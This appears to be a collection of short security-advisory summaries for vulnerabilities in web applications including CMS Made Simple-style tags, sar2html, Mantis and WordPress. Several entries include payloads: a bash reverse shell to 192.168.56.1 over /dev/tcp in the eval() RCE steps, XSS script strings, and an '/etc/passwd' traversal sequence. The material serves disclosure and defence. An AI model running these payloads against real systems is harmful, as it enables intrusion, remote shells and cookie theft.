The Session ID 'SessionId' is of an insufficient length and can be exploited by brute force, which may allow a remote attacker to obtain a valid session, bypass authentication and disclose the live camera stream.
This Vulnerability Leads an Attacker to Inject Malicious Payloads in Chat section each time admin/user visits and manages the user data, The Malicious Payload(XSS) triggers and attacker can capture the admin cookies and access the users Data
A stored XSS vulnerability exists in the /_core/profile/ URL when the avatar[path] parameter is used in a POST request. The payload used is: '><sCrIpT>alert(1)</sCrIpT>
Vulnerability is present at 'editusertag.php' at line #93 where the user input is in eval() PHP function. Reproduction Steps: 1. Login as administrator user and navigate to Extensions->User Defined Tags 2. Add code with the payload of: exec('/bin/bash -c 'bash -i > /dev/tcp/192.168.56.1/4444 0>&1''); 3. Click on the newly created User Defined Tag and use the Run function RCE will be achieved.
A vulnerability exists in sar2html 3.2.1 which allows an attacker to execute arbitrary code on the vulnerable system. This is due to the application not properly validating user-supplied input before using it in a system call. An attacker can exploit this vulnerability by sending a specially crafted HTTP request containing malicious code to the vulnerable server. Successful exploitation of this vulnerability could result in arbitrary code execution on the vulnerable system.
A path traversal vulnerability in Advanced Comment System (ACS) v1.0 allows an attacker to read arbitrary files on the server by sending a specially crafted HTTP request containing directory traversal sequences (e.g. '../../../etc/passwd') in the 'ACS_path' parameter.
Knockpy, as part of its subdomain brute forcing flow of a remote domain, issues a HEAD request to the server to fetch details such as headers, status code, etc. The data then gets reflected when issuing the -c flag to store as a CSV file with the Server HTTP Response Header unfiltered. An attacker can inject malicious Nginx config to return CSV formula headers, which can be used to inject malicious code into the CSV file.
Mantis Bug Tracker 2.24.3 is vulnerable to a SQL injection vulnerability in the 'access' parameter of the mc_project_get_users SOAP API. An attacker can exploit this vulnerability to gain access to the application's database, allowing them to view, modify, or delete data.
This vulnerability can results attacker to inject the XSS payload into the IMAGE URL and each time any user will go to that URL, the XSS triggers, and the attacker can able to steal the cookie according to the crafted payload.
WordPress before 5.2.3 allows XSS in post previews by authenticated users. The vulnerability is due to two condition: 1. wp_kses_bad_protocol_once() has an issue with URL sanitization that can be passed and can lead to cross-site scripting vulnerability. This allows an attacker to inject attack strings such as: <a href="javascript:alert(document.domain)">Example Attack</a>
Services By CQR